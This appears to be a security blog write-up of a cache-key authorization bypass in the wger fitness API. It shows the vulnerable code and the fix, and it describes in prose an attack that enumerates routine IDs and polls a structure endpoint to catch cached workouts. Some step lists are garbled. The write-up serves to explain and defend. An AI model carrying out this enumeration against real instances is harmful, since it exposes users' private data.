Feb 27, 2026·5 min read·3 visits
The wger API cached workout routines using keys that didn't include the User ID. If User A viewed their workout, it was cached globally. User B could then request User A's workout ID, hit the cache, and receive the data without an ownership check.
A classic case of 'premature optimization' leading to security failure. In the wger fitness manager, a caching mechanism designed to speed up API responses inadvertantly bypassed authentication checks. By generating cache keys based solely on the resource ID—ignoring the requesting user's identity—the application served private workout routines to unauthorized users, provided the victim had recently accessed the data.
Donald Knuth once famously said, "Premature optimization is the root of all evil." In the world of web security, I'd argue that caching is the root of about 30% of modern IDORs (Insecure Direct Object References).
Meet wger (pronounced however you like, but likely "manager" without the vowels), a popular open-source fitness tracker. It's a great tool for tracking your bench press PRs and your caloric intake. But in versions leading up to 2.4, it was also a great tool for tracking other people's bench press PRs.
The developers, in a noble attempt to make the application snappy, implemented a server-side cache for workout routines. Routines are complex objects—they have days, exercises, sets, and reps. Fetching that structure from the database every time a user taps "Start Workout" is expensive. So, they cached it. The problem? They treated the cache like a public library instead of a private locker room.
To understand this vulnerability, you have to look at the flow of a standard Django Rest Framework (DRF) request. Usually, it goes like this: Request comes in -> Auth Check -> Permission Check -> Database Lookup -> Serialization -> Response.
In wger's vulnerable endpoints (specifically structure, stats, and logs within manager/api/views.py), the flow was hijacked for speed. The application logic looked something like this:
1337) and make a string: routine-api-structure-1337.self.get_object() permission check.Do you see the massive logic gap? The permission check (which verifies "Does User B own Routine 1337?") happens in step 4. But if the cache hits in step 3, step 4 never happens. The gatekeeper is asleep because the receptionist already handed out the keys.
Let's look at the actual code responsible for this. This isn't a complex buffer overflow; it's a simple logic error in Python. Here is the vulnerable pattern found in wger/manager/api/views.py:
@action(detail=True, url_path='structure')
def structure(self, request, pk):
# VULNERABLE KEY GENERATION
# The key is based ONLY on the Primary Key (pk)
cache_key = CacheKeyMapper.routine_api_structure_key(pk)
# CACHE LOOKUP
cached_data = cache.get(cache_key)
# THE BYPASS
if cached_data is not None:
# Returns data immediately. No ownership check.
# No request.user check.
return Response(cached_data)
# SECURITY CHECK (Too little, too late)
# This only runs if the cache is empty
instance = self.get_object()
serializer = self.get_serializer(instance)
data = serializer.data
cache.set(cache_key, data, 3600)
return Response(data)The fix, implemented in commit e964328, was ridiculously simple: Scope the key to the user. By adding the User ID to the cache key, the cache becomes private per user.
The Fix (wger/utils/cache.py):
# Old
def routine_api_structure_key(cls, pk):
return f'routine-api-structure-{pk}'
# New
def routine_api_structure_key(cls, pk, user_id):
return f'routine-api-structure-{user_id}-{pk}'Now, if I request Routine 1337, the system looks for routine-api-structure-MY_ID-1337. It won't find the entry for routine-api-structure-VICTIM_ID-1337, forcing a cache miss and a subsequent permission check.
This vulnerability has a severity score of Low (3.1), which I find amusingly optimistic. The reasoning is that the attacker cannot force the data into the cache; the victim must put it there. But in a social fitness app, users are constantly accessing their routines.
The Attack Scenario:
Recon: The attacker creates a free account on the wger instance.
Targeting: The attacker writes a script to iterate through Routine IDs (sequential integers are the bane of security). Let's say we want to spy on User ID 42.
The Campout: The script polls GET /api/v2/routine/100/structure/, 101/structure/, etc.
The Trigger: The victim walks into their gym, opens the wger app, and taps "Pull Day". The app fetches Routine 100. The server caches it as routine-api-structure-100.
The Snatch: Milliseconds later, the attacker's script requests GET /api/v2/routine/100/structure/.
routine-api-structure-100? Yes."It's a race condition where the "race" is just waiting for the victim to do what the app is designed to do.
Why does this matter? It's just pushups, right?
Not quite. The leaked endpoints (structure, stats, logs) reveal usage patterns. If I can see your workout logs, I know:
Furthermore, this is an unchecked read primitive. If the application logic relied on this data for other decisions, or if sensitive PII was embedded in the routine notes (e.g., "meet trainer at 5pm"), that information is compromised. It breaks the fundamental promise of multi-tenant SaaS: data isolation.
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N| Product | Affected Versions | Fixed Version |
|---|---|---|
wger wger-project | <= 2.4 | 2.5 (implied post-commit) |
| Attribute | Detail |
|---|---|
| CWE | CWE-639 (Authorization Bypass Through User-Controlled Key) |
| CVSS | 3.1 (Low) |
| Attack Vector | Network (API) |
| Exploit Requirements | Authenticated, Victim Interaction (Cache Priming) |
| Privileges Required | Low (Any valid user) |
| Status | Patched |